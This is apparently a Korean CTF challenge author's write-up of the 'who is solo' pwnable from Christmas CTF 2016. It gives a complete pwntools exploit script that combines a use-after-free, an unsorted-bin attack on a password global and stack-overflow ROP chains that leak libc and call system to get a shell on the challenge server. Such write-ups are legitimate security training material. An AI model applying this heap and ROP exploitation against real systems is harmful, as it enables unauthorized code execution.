[christmas ctf 2016] who is solo 문제풀이CTF 2016. 12. 25. 16:50
광준이형 덕분에 크리스마스 씨티엪에 문제를 낼 기회가 생겼다! 감사합니다 형 :)
그냥 stack overflow문제는 뻔하고, unsorted bin attack으로 password 덮어주고 64bit rop 통해서 password 담아낸걸 릭해내고 오프셋 계산을 통해 system, pop 가젯을 구해서 익스플로잇 하는 문제임!
unsorted bin attack 만 알면 풀 수 있는데, 사람들이 잘 몰랐던것 같다. 익스가 좀 귀찮긴한듯..
ㄹㅇ 사람들 다 fastbin으로 password 덮어서 ROP로 GOT libc 릭해서 품 ㅂㄷㅂㄷ
Full RELRO랑 스태틱컴파일해서 낼걸
아이디어가 하나있었는데 문제만들고 익스가 넘 힘들어서 포기했고ㅠㅠㅠㅠ
플래그는 내 현실을 빗대어 작성함;; ㄹㅇ 후..
이 문젠 총 9팀이품!
"""Exploit script from the 'who is solo' (Christmas CTF 2016) writeup.

Drives the challenge binary's text menu over a pwntools socket.  Stage order
(see the ``__main__`` block): allocate three chunks, free one, corrupt the
freed chunk's metadata through the hidden "Modify Data" option so that the
next allocation writes an allocator pointer over ``password``, then use the
password prompt's stack overflow twice -- once to print ``password`` (libc
leak), once to read a command into memory and call system().

The two program bugs the script depends on are both visible below: a freed
chunk stays viewable/modifiable (use-after-free), and the password prompt
accepts far more than 1032 bytes into a stack buffer (overflow).  Python 2 /
old pwntools era code (print statements, raw_input, str payloads).
"""
from pwn import *
p = remote("52.175.144.148",9901)
# Address of the global `password` buffer; the fixed 0x40xxxx/0x60xxxx
# addresses used throughout suggest the binary is not position-independent.
password = 0x602080
#offset = 0x4647C
# Candidate one-gadget offset inside the target libc; only read by the unused get_leak().
offset1 = 0x046428
magic_gadget = 0
def malloc():
    """Allocate chunks 1, 2 and 3 (128 bytes each, filled with "AAAA") via menu option 1.

    Every menu prompt is echoed to stdout as it is consumed.
    """
    print p.recvuntil("$ ")
    p.sendline("1")
    print p.recvuntil("Allocate Chunk Number: ")
    p.sendline("1")
    print p.recvuntil("Input Size: ")
    p.sendline("128")
    print p.recvuntil("Input Data: ")
    p.sendline("AAAA")
    print p.recvuntil("$ ")
    p.sendline("1")
    print p.recvuntil("Allocate Chunk Number: ")
    p.sendline("2")
    print p.recvuntil("Input Size: ")
    p.sendline("128")
    print p.recvuntil("Input Data: ")
    p.sendline("AAAA")
    print p.recvuntil("$ ")
    p.sendline("1")
    print p.recvuntil("Allocate Chunk Number: ")
    p.sendline("3")
    print p.recvuntil("Input Size: ")
    p.sendline("128")
    print p.recvuntil("Input Data: ")
    p.sendline("AAAA")
def leak_free():
    """Free chunk 2 via menu option 2.

    The program still lets chunk 2 be viewed (get_leak) and modified
    (pass_overwrite) afterwards, which is the use-after-free everything
    else builds on.
    """
    print p.recvuntil("$ ")
    p.sendline("2")
    print p.recvuntil("Free Chunk number: ")
    p.sendline("2")
def get_leak():
    """Read freed chunk 2 back (menu option 3) and derive libc base / a gadget address.

    Not called from ``__main__`` (that call is commented out); it is left
    over from an earlier approach.  The `[5:]` string surgery drops "0x"
    plus the top three hex digits of the leaked value before re-parsing.
    Side effect: sets the module-level ``magic_gadget``.
    """
    global magic_gadget
    print p.recvuntil("$ ")
    p.sendline("3")
    print p.recvuntil("Chunk: ")
    p.sendline("2")
    print p.recvuntil("Data : ")
    libc_leak = u64(p.recv(8))
    libc_leak = int(str(hex(libc_leak))[5:],16)
    # 0x3be7b8 is the distance from the leaked pointer to libc base on the
    # challenge server's libc build (hard-coded by the author).
    libc_base = libc_leak - 0x3be7b8
    magic_gadget = libc_base + offset1
    # print "[*] LIBC LEAK: " + hex(libc_leak)
    print "[*] LIBC BASE: " + hex(libc_base)
    print "[*] Magic: " + hex(magic_gadget)
def pass_overwrite():
    """Corrupt freed chunk 2's header through the hidden menu option 201527.

    After 136 filler bytes the payload lays down a fake size field (0xa1),
    an fd of 1 and a bk of ``password - 16``.  The 144-byte allocation that
    follows (presumably served as a 0xa0-sized chunk, matching the forged
    size) makes the allocator's unsorted-bin handling write an arena pointer
    into ``password`` -- the "unsorted bin attack" the writeup describes.
    Which chunk the allocator actually returns depends on the target's
    glibc version; the writeup reports this works on the challenge server.
    """
    print p.recvuntil("$ ")
    p.sendline("201527")
    print p.recvuntil("Modify Data: ")
    payload = "A"*136
    payload += p64(0xa1)            # forged size field
    payload += p64(0x1)             # fd
    payload += p64(password - 16)   # bk: so that bk->fd lands on `password`
    p.sendline(payload)
    print p.recvuntil("$ ")
    p.sendline("1")
    print p.recvuntil("Allocate Chunk Number: ")
    p.sendline("4")
    print p.recvuntil("Input Size: ")
    p.sendline("144")
    print p.recvuntil("Input Data: ")
    p.sendline("A")
def exploit():
    """Run two ROP chains through the password prompt's stack overflow (menu option 4).

    Stage 1: 1032 filler bytes, then pop rdi / password / printf@plt /
    0x400680 (the return target after the leak -- presumably back into the
    menu loop).  Sending "6" afterwards makes the function return; after the
    next "$ " prompt the first 6 bytes received are the main_arena pointer
    that pass_overwrite() placed in ``password``, and libc_base is derived
    with the hard-coded 0x3be7b8 delta.

    Stage 2: read@plt(0, 0x602060, len(binsh)+1) followed by
    system(0x602060).  Note that the command actually delivered is "sh\\n"
    (``p.sendline("sh")``); ``binsh`` is only used for its length.  All
    libc-relative offsets are for the challenge server's libc build, and
    ``poprcx`` is computed but never used.
    """
    printf_plt = 0x400600
    poprdi = 0x4008a0
    print p.recvuntil("$ ")
    p.sendline("4")
    print p.recvuntil("Input password: ")
    payload = "A"*1032
    payload += p64(poprdi)
    payload += p64(password)
    payload += p64(printf_plt)
    payload += p64(0x400680)
    p.sendline(payload)
    p.sendline("6")
    print p.recvuntil("$ ")
    leak = u64(p.recv(6).ljust(8,'\x00'))
    log.info("main_arena: " + hex(leak))
    libc_base = leak - 0x3be7b8
    # log.info("libc_base: " + hex(libc_base))
    # one_shot = libc_base + 0x46428
    poprdi = 0x4008A0
    poprsi = libc_base + 0x10809A
    poprdx = libc_base + 0xBCDF0
    poprcx = libc_base + 0x0830AE
    libc_system = libc_base + 0x46590
    read_plt = 0x400610
    binsh = "/bin/sh\x00"
    # log.info("One shot: " + hex(one_shot))
    print p.recvuntil("$ ")
    p.sendline("4")
    print p.recvuntil("password: ")
    payload = "A"*1032
    payload += p64(poprdi)
    payload += p64(0)               # rdi = stdin fd
    payload += p64(poprsi)
    payload += p64(0x602060)        # rsi = writable buffer in the binary's data area
    payload += p64(poprdx)
    payload += p64(len(binsh)+1)    # rdx = byte count for read()
    payload += p64(read_plt)
    payload += p64(poprdi)
    payload += p64(0x602060)        # rdi = the buffer read() just filled
    payload += p64(libc_system)
    p.sendline(payload)
    print p.recvuntil("exit")
    p.sendline("6")
    p.sendline("sh")
if __name__ == "__main__":
    raw_input()  # pauses before the session starts -- presumably to attach a debugger
    malloc()
    leak_free()
    #get_leak()
    pass_overwrite()
    exploit()
    p.interactive()